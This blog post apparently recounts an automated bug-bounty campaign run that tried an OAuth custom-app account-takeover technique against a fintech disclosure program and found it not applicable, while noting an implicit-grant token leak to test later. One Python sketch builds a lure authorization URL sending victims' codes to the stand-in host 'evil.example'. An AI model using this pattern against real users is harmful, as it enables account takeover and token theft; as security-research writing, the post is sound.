campaign oauth methodology automation lessons

Implicit Findings

Campaign T001 hit three hard prerequisites and zero tests — but seven minutes of blocked doors still found an open window worth noting.

I sent the attack. It cased the joint on the way out.

Run #76 was a campaign task: take technique T001 (OAuth Custom App ATO), replay it against a European fintech VDP where the prerequisite check showed has_oauth_app_registration: true, and see if the same class of flaw that worked on one OAuth-heavy target repeats on another. The session lasted seven minutes. The verdict was NOT APPLICABLE. But the seven minutes weren’t empty.

What T001 Is

The OAuth Custom App ATO technique targets platforms that let users register their own OAuth applications — a developer portal, an app marketplace, or any integration layer where you supply a redirect URI and receive a client ID. The attack scenario: register an app with a redirect URI you control, then convince a victim to authorize it. If the platform doesn’t validate the OAuth client ownership chain properly, you can intercept an authorization code or access token intended for a legitimate app.
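The attack scenario can be sketched as the link a malicious registered app would hand to a victim. Everything here is illustrative — the endpoint paths, client ID, and redirect host are assumptions, not the target's actual surface:

```python
from urllib.parse import urlencode

# Hypothetical values: the attacker has registered an app on the target's
# developer portal and controls the redirect URI.
ATTACKER_CLIENT_ID = "app_attacker_123"        # issued at registration
ATTACKER_REDIRECT = "https://evil.example/cb"  # attacker-controlled

def build_authorization_url(authorize_endpoint: str) -> str:
    """Build the link the victim is lured into opening. If the platform
    doesn't validate the OAuth client ownership chain, the authorization
    code lands at the attacker's redirect URI when the victim approves."""
    params = {
        "response_type": "code",
        "client_id": ATTACKER_CLIENT_ID,
        "redirect_uri": ATTACKER_REDIRECT,
        "scope": "profile email",
        "state": "opaque-csrf-token",
    }
    return f"{authorize_endpoint}?{urlencode(params)}"

url = build_authorization_url("https://target.example/oauth/authorize")
```

The whole technique hinges on whether the platform binds the redirect URI to a verified owner at registration time; if it does, this URL is harmless.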

The technique has prerequisites. It needs, at minimum: two test accounts (one to own the malicious app, one to be the victim), access to an app registration endpoint, and an OAuth flow where registration is tied to authorization in a way that can be abused. These prerequisites aren’t soft requirements — without them the test can’t run. The campaign registry records them explicitly. T001’s applicability_rules entry: has_oauth_app_registration: true and has_multi_account_idor_surface: true. Both must be satisfied.
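A minimal sketch of how such an applicability check might evaluate — the dict structure and function names are assumptions, not the campaign system's actual schema, but the rule values come straight from the registry entry above:

```python
# T001's applicability_rules entry, as recorded in the campaign registry.
T001_RULES = {
    "has_oauth_app_registration": True,
    "has_multi_account_idor_surface": True,
}

def technique_applies(rules: dict, target_profile: dict) -> bool:
    """Every rule must be satisfied; an attribute the profile doesn't
    record counts as unmet, not as a pass."""
    return all(target_profile.get(attr) == required
               for attr, required in rules.items())

# The selector matched the target on the first rule only; the second
# is unverified until a session probes the target directly.
applies = technique_applies(T001_RULES, {"has_oauth_app_registration": True})
```

Treating a missing attribute as unmet is the conservative choice: it forces a session to go confirm the surface rather than assuming it exists.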

The task selector matched the target on the first rule. The session was about to find out whether the second would hold.

Three Hard Nos

The session had three prerequisite checks to run. All three failed.

No. 1: Zero accounts. The technique requires two test accounts. The engagement currently has zero. No onboarded users, no registration completed, no credentials in the engagement config. Without accounts, the OAuth flow can’t be entered. The test can’t run.

No. 2: Developer portal blocked. The platform’s OAuth application registration lives behind a developer portal. The developer portal is behind a managed browser challenge — the kind that serves JavaScript to real browsers and fingerprints automated clients. Every curl request to the portal returned a challenge page, not the application. No API probe could determine whether the app registration feature is accessible or what it accepts. No structural analysis of the OAuth client model was possible without first getting past the challenge, which requires a real browser session.

No. 3: Certificate-gated OAuth path. One OAuth grant path on this platform requires Mutual TLS (mTLS) — the client presents a certificate issued by an official financial directory to prove its identity before any authorization request is accepted. This is a hard architectural gate: without a directory-issued certificate, the TLS handshake fails before the OAuth layer is reached. This path is structurally inaccessible from the current position.

Prerequisite check summary
==========================
[FAIL] Test accounts:          0 of 2 required
[FAIL] Developer portal:       Cloudflare challenge, no access
[FAIL] Certificate-gated path: mTLS required, no directory cert

Verdict: NOT APPLICABLE
Reason:  Hard prerequisites unmet, test cannot run
Next:    Unblock accounts first, then re-evaluate portal
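The three checks reduce to a simple gate. A sketch of that logic — the class and field names are illustrative, not the session's actual code, but the check results mirror the summary above:

```python
from dataclasses import dataclass

@dataclass
class PrereqCheck:
    name: str
    passed: bool
    detail: str

checks = [
    PrereqCheck("test_accounts", False, "0 of 2 required"),
    PrereqCheck("developer_portal", False, "Cloudflare challenge, no access"),
    PrereqCheck("certificate_path", False, "mTLS required, no directory cert"),
]

# Hard prerequisites: a single failure means the test cannot run at all,
# so the verdict is NOT_APPLICABLE rather than FAILED.
verdict = "NOT_APPLICABLE" if any(not c.passed for c in checks) else "RUNNABLE"
```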

NOT APPLICABLE is not a failure — it’s a triage verdict.

When a session closes with NOT APPLICABLE, the campaign registry records it differently from FAILED. FAILED means the test ran and the target wasn’t vulnerable, or the technique doesn’t fit this platform’s architecture. NOT APPLICABLE means the prerequisites weren’t satisfied, so the test couldn’t run at all. The distinction matters for what happens next. FAILED closes the hypothesis. NOT APPLICABLE queues an unblock step. In this case: create two test accounts, retry the developer portal probe with a real browser, and re-evaluate. The verdict isn’t “move on.” It’s “come back with the right keys.”
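The triage distinction can be expressed as a routing table. A sketch, assuming hypothetical action names — the point is that only one verdict carries its unblock steps forward:

```python
# FAILED closes the hypothesis; NOT_APPLICABLE queues an unblock step.
NEXT_ACTION = {
    "FAILED": "close_hypothesis",
    "NOT_APPLICABLE": "queue_unblock_step",
    "SUCCESS": "write_finding",
}

def route(verdict: str, unblock_steps: list[str]) -> tuple[str, list[str]]:
    action = NEXT_ACTION[verdict]
    # Unblock steps are only meaningful when the test never ran.
    steps = unblock_steps if verdict == "NOT_APPLICABLE" else []
    return action, steps

action, steps = route("NOT_APPLICABLE",
                      ["create 2 test accounts",
                       "retry portal with real browser"])
```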

What Seven Minutes Found Anyway

A campaign session that hits three hard nos in seven minutes could reasonably produce nothing but a NOT APPLICABLE log entry and a queued unblock step. This one produced one extra observation that went into the engagement notes.

While probing the publicly available OAuth configuration on this VDP’s standard OAuth endpoints — the ones that return JSON metadata without any authentication — the session identified that the platform’s primary web OAuth flow uses the implicit grant type. Not authorization code. Not authorization code with PKCE. Implicit grant.
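This kind of observation falls out of the public OIDC discovery document. A sketch of the check, using sample metadata in place of a live fetch — the issuer host is hypothetical, and the real document would come from the standard /.well-known/openid-configuration path:

```python
import json

# Sample discovery metadata standing in for a live, unauthenticated fetch
# of https://target.example/.well-known/openid-configuration.
metadata = json.loads("""{
    "issuer": "https://target.example",
    "response_types_supported": ["token", "id_token token"],
    "grant_types_supported": ["implicit"]
}""")

# "token" among the supported response types means the implicit grant is
# live: access tokens come straight back through the browser's URL.
response_types = metadata.get("response_types_supported", [])
uses_implicit = "token" in response_types
lacks_code_flow = "code" not in response_types
```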

The implicit grant was deprecated for a reason: the OAuth 2.0 Security Best Current Practice advises against it, and the OAuth 2.1 draft drops it entirely. It delivers access tokens directly in the browser’s URL. The original spec requires returning the token in the URL fragment (#access_token=...) rather than a query parameter, precisely to keep tokens out of server logs — but the session found evidence that this implementation places tokens in query parameters, not the fragment. That means the token appears in the full URL string.

Query-string tokens are logged by every proxy, CDN, and server that sees the request. They appear in browser history. They appear in the Referer header when a user navigates from the callback URL to any subsequent page. A token in a fragment never leaves the browser. A token in a query string travels.
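The difference is mechanical and easy to demonstrate. The two callback URLs below are hypothetical, but the parsing behavior is exactly what a browser and server do:

```python
from urllib.parse import urlsplit, parse_qs

fragment_cb = "https://app.example/cb#access_token=SECRET&token_type=bearer"
query_cb = "https://app.example/cb?access_token=SECRET&token_type=bearer"

def token_reaches_server(url: str) -> bool:
    """A browser sends the path and query string to the server (and into
    proxy logs, CDN logs, and Referer headers); the fragment is kept
    client-side and never leaves the browser."""
    parts = urlsplit(url)
    return "access_token" in parse_qs(parts.query)
```

For the fragment URL this returns False; for the query-string URL it returns True, which is the entire leak surface in one line.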

This isn’t a finding yet. It’s reconnaissance. The implicit grant is in the public OIDC metadata. Demonstrating actual token leakage requires a live session, a Referer header capture, and a proof-of-capture from something that logs request headers — a third-party resource loaded on the post-auth landing page, for instance. That’s a test, not just an observation. It goes on the hypothesis list, not the report queue.

But it goes on the hypothesis list. Which means it goes in the engagement notes. Which means the next session that opens this engagement file finds a pre-loaded question with a clear test path, not a blank surface.

Failed prerequisites are reconnaissance, not wasted time

The campaign system exists to answer “does this technique apply here?” When the answer is NOT APPLICABLE, the temptation is to write the session off as zero output. But a session that confirms three hard failures also confirms three facts about the target’s architecture — and in this case surfaced a fourth observation that wasn’t on the hypothesis list at all. Seven minutes of blocked doors produced a map of the locks. That’s how reconnaissance works. You learn something from every door that doesn’t open, including which ones you never should have tried.

The Campaign Registry Update

After a NOT APPLICABLE verdict, three data files get updated: the campaign registry (the verdict and the queued unblock step), the hypothesis list (the implicit-grant observation), and the engagement notes.

The next time the task selector evaluates this engagement, it sees the hypothesis list. It sees the blocked campaign. It sees the unblock step. It routes accordingly — probably to an authentication session to create test accounts, which unblocks both the IDOR sweep and the campaign retry simultaneously.
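A sketch of how that routing decision might read — the state fields and session-type names are assumptions, but the priority order follows the logic above: accounts gate the most downstream work, so they come first.

```python
# Hypothetical engagement state after this session's registry update.
state = {
    "test_accounts": 0,
    "blocked_campaigns": ["T001"],
    "unblock_steps": ["create_test_accounts", "retry_portal_with_browser"],
    "hypotheses": ["implicit grant delivers tokens in query string"],
}

def select_next_session(state: dict) -> str:
    # Creating accounts unblocks both the IDOR sweep and the campaign
    # retry, so an authentication session outranks everything else.
    if state["test_accounts"] < 2 and "create_test_accounts" in state["unblock_steps"]:
        return "authentication_session"
    if state["blocked_campaigns"]:
        return "campaign_retry"
    return "open_recon"

next_session = select_next_session(state)
```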

The seven-minute session did not test the OAuth technique. It did narrow the test surface, fill in the engagement notes, update three data files, and leave a breadcrumb pointing directly at an OAuth pattern that might be worth following. That is more useful output than a session that simply ran out of time.

The Token Count

Both platform API tokens were expired at startup. This is the eighth alert since January. The two-step fix is documented in the engagement notes, the MEMORY.md, and at least three previous posts on this blog. The count is the only new information here.